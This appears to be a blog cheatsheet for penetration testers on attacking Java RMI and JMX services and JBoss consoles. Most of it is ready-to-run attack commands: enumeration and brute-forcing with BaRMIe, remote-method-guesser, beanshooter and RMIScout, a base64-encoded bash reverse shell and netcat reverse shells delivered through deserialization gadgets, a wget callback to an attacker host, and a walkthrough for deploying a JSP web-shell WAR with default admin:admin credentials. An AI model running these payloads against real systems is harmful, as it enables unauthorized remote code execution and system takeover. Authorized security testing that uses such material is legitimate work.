RMI can be run on any nonstandard port and when RMI is running you will observer one more endpoint port connected to it (find it from nmap easily by running rmi-dumpregistry )
Java Management Extensions (JMX) and Remote Method Invocation (RMI) play crucial roles in the management and monitoring of Java applications. They allow developers and administrators to interact with applications remotely, providing a powerful interface for managing resources. However, this also opens up potential vulnerabilities that can be exploited if not properly secured. This cheatsheet is designed for penetration testers and security professionals looking to understand and exploit weaknesses in Java JMX RMI implementations effectively.
#jmxrmi bound name and its signatures might be vulnerable to MLetMbean Vuln, where MBean that can be used for loading additional MBeans over the network.
java.lang.String getVersion()
javax.management.remote.rmi.RMIConnection newClient(java.lang.Object arg)
Java RMI Registry - Port 1616
nmap -Pn -sS -sV --script "rmi-dumpregistry or rmi-vuln-classloader" -p 1616
What is Java RMI?
The Java Remote Method Invocation (RMI) system allows an object running in one Java virtual machine to invoke methods on an object running in another Java virtual machine. RMI provides for remote communication between programs written in the Java programming language. When developers want to make their Java objects available within the network, they usually bind them to an RMI registry. The registry stores all information required to connect to the object (IP address, listening port, implemented class or interface and the ObjID value) and makes it available under a human readable name (the bound name). Clients that want to consume the RMI service ask the RMI registry for the corresponding bound name and the registry returns all required information to connect. Thus, the situation is basically the same as with an ordinary DNS service.What is Apache Tomcat?
Apache Tomcat is a free and open-source implementation of the Jakarta Servlet, Jakarta Expression Language, and WebSocket technologies. It provides a "pure Java" HTTP web server environment in which Java code can run.What is JBoss application server?
JBoss application server is an open-source platform, developed by Red Hat, used for implementing Java applications and a wide variety of other software applications. You can build and deploy Java services to be scaled to fit the size of your business.What is JMX?
Java Management Extensions (JMX) is a Java technology that supplies tools for managing and monitoring applications, system objects, devices (such as printers) and service-oriented networks. Those resources are represented by objects called MBeans (for Managed Bean). Using the JMX console, we can manage the application and, therefore, alter it to execute malicious code on the target server and gain remote code execution.What is an MBean?
An MBean is a managed Java object, similar to a JavaBeans component, that follows the design patterns set forth in the JMX specification. An MBean can represent a device, an application, or any resource that needs to be managed.
BaRMIe
#Download the package from releases https://github.com/NickstaDB/BaRMIe/releases/tag/v1.01 java -jar BaRMIe.jar -enum 192.168.1.11 5000 java -jar BaRMIe.jar -attack 192.168.1.11 5000
Remote Method Guesser
https://github.com/qtc-de/remote-method-guesser java -jar rmg-3.0.0-jar-with-dependencies.jar 10.10.10.10 5000 enum #Look for Vulnerabilities java -jar rmg.jar enum 10.10.10.10 5000 #Get bound names/Brute Force & available method signatures java -jar rmg.jar guess 10.10.10.10 1099 Output: CustomRMIServer ] HIT! Method with signature String runCommand(Strin #Exploiting the Available Method java -jar rmg.jar call domain-test.com 1099 --bound-name CustomRMIServer 'new String[] {"ls", "-al"}' --signature 'String runCommand(String[] args)' # By Default, Remote Method Guesser does not display the function/command output, we need to use remote plugins to get the output # Function name/ Bound name = CustomRMIServer; Followed by the signare found by guesser # Let's use Time module and sleep command to find out if we are able to execute the commands or not time java -jar rmg.jar call domain-test.com 1099 --bound-name CustomRMIServer 'new String[] {"sleep", "5"}' --signature 'String runCommand(String[] args)' # If the Sleep is successful, then time for command execution using RMG plugins -GenericPrint.jar java -jar rmg.jar call domain-test.com 1099 --bound-name CustomRMIServer 'new String[] {"ls", "-al"}' --signature 'String runCommand(String[] args)' --plugin plugins/GenericPrint.jar # Gaining Reverse Shell echo '/bin/bash -c "bash -i >& /dev/tcp/10.10.10.1/443 0>&1"' | base64 -w0;echo java -jar rmg.jar call domain-test.com 1099 'new String[] {"/bin/bash", "-c", "echo L2Jpbi9iYXNoIC1jICJiYXNoIC1pID4mIC9kZXYvdGNwLzEwLjEwLjEwLjEvNDQzIDA+JjEiCg==| base64 -d | bash"}' --signature 'String runCommand(String[] args)' --bound-name CustomRMIServer --plugin plugins/GenericPrint.jar #Command Exec - Example java -jar rmg.jar call 10.10.10.10 5000 "wget Attacker_IP:8000/worked" --signature 'String execute(String cmd)' --bound-name jmxrmi #Exploit CVE-2019-2684; Try to bind client locally; doesnt work for JMX RMI java -jar rmg.jar bind 10.10.10.10 5000 10.11.11.11:8080 my-object --localhost-bypass
Beanshooter
#Good for JMX Severs Source - https://github.com/qtc-de/beanshooter#Serial #Download package from repo https://github.com/qtc-de/beanshooter/releases #Check for auth and possible attr #If auth is enabled; cannot go further. java -jar beanshooter.jar info 10.10.10.10 5000 #Enum - Check for vulns (Auth and Pre-auth Deserialization) java -jar beanshooter.jar enum 10.10.10.10 5000 #Bruteforce creds java -jar beanshooter.jar brute 10.10.10.10 5000 --username-file /usr/share/wordlists/user.txt --password-file /usr/share/wordlists/pass.txt #You might require ysoserial.jar, download and copy it to /opt/yso.jar or add an arg "--yso /opt/yso.jar" #Get a REVERSE SHELL; java -jar beanshooter.jar serial 10.10.10.10 5000 CommonsCollections6 "nc 10.11.11.11 443 -e ash" --username admin --password admin #Add --preauth if pre-auth deserialization is enabled java -jar beanshooter.jar serial 10.10.10.10 5000 --preauth CommonsCollections6 "nc 10.11.11.11 443 -e ash" #If SSL is enabled java -jar beanshooter.jar enum --ssl 10.10.10.10 5000 #If Remote MBean server Does not require auth #This might require tonka; you can find it in beanshooter repo; https://github.com/qtc-de/beanshooter#deploy
RMIScout
#Download the package https://github.com/BishopFox/rmiscout/releases git clone https://github.com/BishopFox/rmiscout.git #Bruteforce java -jar rmiscout.jar bruteforce -i lists/methods.txt -r void,boolean,long -p String,int -l 1,4 <host> <port> #Wordlist java -jar rmiscout.sh wordlist -i lists/prototypes.txt <host> <port>
Attacking JBOSS JMX Management
default username/password is admin:admin - Under 'JMX Agent View' page, you can search for any JBOSS API - search for 'jboss.system*' to Search for the MainDeployer (JBoss System API). - The MainDeployer service can be used to manage deployments on the JBoss application server. - Scroll down to the redeploy attribute. Make sure the redeploy attribute accepts a URL as the input (java.net.URL) - Use the backdoor JSP Payload from -https://github.com/fuzzdb-project/fuzzdb/blob/master/web-backdoors/jsp/cmd.jsp - Create a war file using `jar -cvf cmd.war cmd.jsp` - Set it on a python HTTP Server and make sure its accessible from JBOSS Server , we can invoke a war file from a url and install it - Under MainDeployer, Head over to the JMX Console page and under the redeploy attribute --> java.net.URL --> paste the cmd.war file url and hit "Deploy" - now head over to 'http://domain.com/cmd/cmd.jsp' for GET command Execution
No comments:
Post a Comment